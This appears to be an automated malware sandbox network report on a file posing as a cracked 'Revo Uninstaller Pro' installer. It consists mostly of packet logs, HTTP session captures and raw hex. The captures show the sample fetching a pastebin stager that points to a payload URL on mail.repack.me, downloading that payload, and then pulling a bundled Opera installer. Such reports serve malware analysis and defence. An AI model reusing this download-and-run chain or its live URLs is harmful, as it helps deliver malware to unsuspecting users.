Dec 9, 2024 17:54:05.385579109 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.392193079 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.392208099 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.392265081 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.392271996 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.392371893 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.399522066 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.399538040 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.399650097 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.399657011 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.399930954 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.405843973 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.405860901 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.405916929 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.405925035 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.405957937 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.551642895 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.551670074 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.551723957 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.551743031 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.551781893 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.551963091 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.558568954 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.558590889 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.558648109 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.558655024 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.558720112 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.564657927 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.564682961 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.564753056 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.564762115 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.564793110 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.565136909 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.572031975 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.572053909 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.572141886 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.572149992 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.572419882 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.578077078 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.578099966 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.578197956 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.578202963 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.578226089 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.578480959 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.584372997 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.584393024 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.584439993 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.584445000 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.584487915 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.584719896 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.591350079 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.591377974 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.591634989 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.591641903 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.591737032 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.597274065 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.597297907 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.597362995 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.597368956 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.597413063 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.597655058 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.744554996 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.744582891 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.744647980 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.744647980 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.744668007 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.744829893 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.750495911 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.750518084 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.750591040 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.750591040 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.750603914 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.750647068 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.757236004 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.757256985 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.757318020 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.757318020 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.757328033 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.757512093 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.764091015 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.764112949 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.764147997 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.764157057 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.764174938 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.764309883 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.770165920 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.770184040 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.770220041 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.770226955 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.770253897 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.770332098 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.776926041 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.776947021 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.776994944 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.777004957 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.777015924 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.777297020 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.783354044 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.783375025 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.783423901 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.783432007 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.783454895 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.783744097 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.790121078 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.790139914 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.790172100 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.790179014 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.790205002 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.790237904 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.936094999 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.936117887 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.936181068 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.936197996 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.936207056 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.936264038 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.942866087 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.942890882 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.943047047 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.943056107 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.943799019 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.949578047 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.949596882 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.949805975 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.949811935 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.950042009 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.956522942 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.956548929 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.956589937 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.956595898 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.956633091 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.956660986 CET   49824        443        192.168.2.4    107.167.96.30
Dec 9, 2024 17:54:05.962596893 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.962624073 CET   443          49824      107.167.96.30  192.168.2.4
Dec 9, 2024 17:54:05.962757111 CET   49824        443        192.168.2.4    107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.962762117 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.962923050 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.969199896 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.969218969 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.969274998 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.969280005 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.969331980 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.975687027 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.975704908 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.975771904 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.975778103 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.976535082 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.982486010 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.982502937 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.982592106 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.982592106 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:05.982598066 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:05.982763052 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.129173994 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.129200935 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.129300117 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.129321098 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.129357100 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.129431009 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.135236979 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.135256052 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.135337114 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.135343075 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.135601997 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.141974926 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.141992092 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.142188072 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.142193079 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.142230034 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.148070097 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.148130894 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.148154974 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:06.148155928 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.148178101 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.148200989 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.148319006 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:06.148330927 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:10.621921062 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:10.621992111 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:10.622066975 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:10.628257036 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:10.628315926 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:10.628362894 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:10.660134077 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:10.660161018 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:10.660347939 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:10.660371065 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.224936008 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:11.224999905 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.225061893 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:11.227109909 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:11.227123976 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.915776968 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.915946960 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:11.916114092 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.916342974 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:11.988487959 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:11.988496065 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:11.988527060 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.988540888 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.988895893 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.988910913 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:11.988997936 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:11.989029884 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:11.991153002 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:11.993455887 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:12.035324097 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.035332918 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.359565020 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.359649897 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.359673023 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:12.359916925 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:12.365382910 CET49850443192.168.2.4107.167.96.39
                                                                                                                                                                          Dec 9, 2024 17:54:12.365403891 CET44349850107.167.96.39192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.390427113 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.390491009 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:12.390516996 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.390579939 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.390631914 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:12.711154938 CET49849443192.168.2.4107.167.96.38
                                                                                                                                                                          Dec 9, 2024 17:54:12.711195946 CET44349849107.167.96.38192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.824083090 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:12.824160099 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.174374104 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.174408913 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.174860001 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.174921036 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.175337076 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.175426960 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.175431967 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.311644077 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:13.311714888 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.311835051 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:13.312406063 CET49857443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:13.312424898 CET44349857107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.613828897 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:13.613878965 CET44349858107.167.96.36192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.613953114 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:13.614346981 CET49858443192.168.2.4107.167.96.36
                                                                                                                                                                          Dec 9, 2024 17:54:13.614362955 CET44349858107.167.96.36192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.626647949 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.626701117 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.626713037 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.626723051 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.626744032 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.626766920 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.626866102 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.626879930 CET44349851107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:13.626889944 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.626923084 CET49851443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.628355026 CET49859443192.168.2.4107.167.125.189
                                                                                                                                                                          Dec 9, 2024 17:54:13.628400087 CET44349859107.167.125.189192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:15.465362072 CET1.1.1.1192.168.2.40x71dfNo error (0)download3.operacdn.comv2.download3.operacdn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          • pastebin.com
                                                                                                                                                                          • mail.repack.me
                                                                                                                                                                          • net.geo.opera.com
                                                                                                                                                                          • autoupdate.geo.opera.com
                                                                                                                                                                          • autoupdate.opera.com
                                                                                                                                                                          • desktop-netinstaller-sub.osp.opera.software
                                                                                                                                                                          • features.opera-api2.com
                                                                                                                                                                          • download.opera.com
Session ID: 0
Source IP: 192.168.2.4   Source Port: 49736
Destination IP: 104.20.3.235   Destination Port: 443
PID: 7324
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe

Timestamp: 2024-12-09 16:53:11 UTC   Bytes transferred: 133   Direction: OUT
GET /raw/vkwZzU9B HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: pastebin.com
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-12-09 16:53:11 UTC   Bytes transferred: 397   Direction: IN
HTTP/1.1 200 OK
Date: Mon, 09 Dec 2024 16:53:11 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 818
Last-Modified: Mon, 09 Dec 2024 16:39:33 GMT
Server: cloudflare
CF-RAY: 8ef6828cbafe439c-EWR

Timestamp: 2024-12-09 16:53:11 UTC   Bytes transferred: 41   Direction: IN
Data Raw: 32 33 0d 0a 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 72 65 70 61 63 6b 2e 6d 65 2f 74 73 6a 74 6d 66 64 6d 2e 70 6b 67 0d 0a
Data Ascii: 23https://mail.repack.me/tsjtmfdm.pkg

Timestamp: 2024-12-09 16:53:11 UTC   Bytes transferred: 5   Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 1
Source IP: 192.168.2.4   Source Port: 49737
Destination IP: 194.87.189.43   Destination Port: 443
PID: 7324
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe

Timestamp: 2024-12-09 16:53:13 UTC   Bytes transferred: 135   Direction: OUT
GET /tsjtmfdm.pkg HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mail.repack.me
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-12-09 16:53:14 UTC   Bytes transferred: 283   Direction: IN
HTTP/1.1 200 OK
Server: nginx/1.26.2
Date: Mon, 09 Dec 2024 16:53:13 GMT
Content-Type: application/octet-stream
Content-Length: 419886
Last-Modified: Mon, 28 Oct 2024 17:07:02 GMT
Connection: close
ETag: "671fc4b6-6682e"
Alt-Svc: h3=":443"; ma=86400
Accept-Ranges: bytes


Session ID: 2
Source IP: 192.168.2.4   Source Port: 49824
Destination IP: 107.167.96.30   Destination Port: 443
PID: 4420
Process: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe

Timestamp: 2024-12-09 16:54:02 UTC   Bytes transferred: 196   Direction: OUT
GET /opera/stable/windows?utm_source=DWNLST&utm_medium=apb&utm_campaign=r10 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: net.geo.opera.com
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-12-09 16:54:02 UTC   Bytes transferred: 322   Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 16:54:02 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close
Content-Disposition: attachment; filename=OperaSetup.exe
ETag: "5a1105f1c25a60b128d45ec03041bf48"
Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                          2024-12-09 16:54:02 UTC16384INData Raw: 33 ff e8 e1 5c ff ff 85 c0 74 15 8d 4e 68 e8 49 07 00 00 8d 4e 10 47 e8 cc 5c ff ff 3b f8 72 eb 5f 5e 33 c0 5b 5d c2 04 00 55 8b ec 53 56 57 8b 7d 08 8b d9 0f b6 47 09 8d 4b 44 50 e8 77 07 00 00 0f b6 47 08 8d 4b 50 50 e8 6a 07 00 00 8d 4b 74 e8 a7 06 00 00 8b 4f 0c 8b f0 57 89 4e 20 8d 4e 18 e8 fa bc ff ff 8d 4f 04 51 8d 4e 1c e8 ee bc ff ff 8a 43 5c 5f 88 46 68 5e 5b 5d c2 04 00 55 8b ec ff 75 08 83 c1 74 e8 d0 5d ff ff 83 c0 18 5d c2 04 00 56 57 8d 79 68 33 f6 8b cf e8 d4 5d ff ff 85 c0 74 1f 56 8b cf e8 af 5d ff ff 8b c8 e8 c0 25 00 00 85 c0 75 0e 8b cf 46 e8 b5 5d ff ff 3b f0 72 e1 33 c0 5f 5e c3 55 8b ec 80 7d 08 00 56 8b f1 57 8b 7e 28 75 69 53 57 8d 4e 74 e8 79 5d ff ff 83 78 20 01 75 58 8d 46 44 57 8b c8 e8 8b bc ff ff 80 38 00 74 48 57 8d 4e 2c
                                                                                                                                                                          Data Ascii: 3\tNhING\;r_^3[]USVW}GKDPwGKPPjKtOWN NOQNC\_Fh^[]Uut]]VWyh3]tV]%uF];r3_^U}VW~(uiSWNty]x uXFDW8tHWN,
